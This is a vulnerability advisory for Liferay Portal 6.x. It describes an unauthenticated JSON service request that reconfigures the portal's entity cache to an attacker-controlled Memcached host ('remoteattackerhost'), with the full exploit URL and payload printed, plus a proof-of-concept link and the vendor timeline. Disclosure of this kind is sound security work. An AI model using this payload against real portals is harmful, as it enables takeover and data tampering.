Specially crafted Json service request allows full control over a Liferay portal instance

Specially crafted Json service request allows full control over a
Liferay portal instance

Description:

Liferay Portal is an enterprise portal written in Java

By doing a single http request you can reconfigure Liferay to use a
remote Memcached cache instead of it's own cache.

http://vulnerablehost/c/portal/json_service?serviceClassName=com.liferay.portal.service.UserServiceUtil&serviceMethodName=updatePortrait&serviceParameters=[%22userId%22%2C%22bytes%22]&userId=1&bytes={"class":"com.liferay.portal.kernel.dao.orm.EntityCacheUtil","entityCache":{"class":"com.liferay.portal.dao.orm.common.EntityCacheImpl","multiVMPool":{"class":"com.liferay.portal.cache.MultiVMPoolImpl","portalCacheManager":{"class":"com.liferay.portal.cache.memcached.MemcachePortalCacheManager","timeout":60,"timeoutTimeUnit":"SECONDS","memcachedClientPool":{"class":"com.liferay.portal.cache.memcached.DefaultMemcachedClientFactory","connectionFactory":{"class":"net.spy.memcached.BinaryConnectionFactory"},"addresses":["remoteattackerhost:11211"]}}}}}

This means that all entities stored in the database will now be cached
in a Memcached instance hosted on the attackers host, where they can
be retrieved or manipulated at will by the attacker. A moderately
skilled attacker could leverage this to gain administrative access to
the system. The attacker does not need to have an account on the
portal in order to execute this attack

Proof of concept:

Code demonstrating the vulnerability can be found at

https://github.com/jelmerk/LPS-26558-proof

Systems affected:

Liferay 6.1 ce is confirmed to be vulnerable
Liferay 6 ee service servicepack 2 is most likely vulnerable
Liferay 6.1 ee is most likely vulnerable

Vendor status :

Liferay was notified april 6 2012 by filing a bug in their public
bugtracker under issue number LPS-26558. The issue has since been
flagged as private and has been resolved.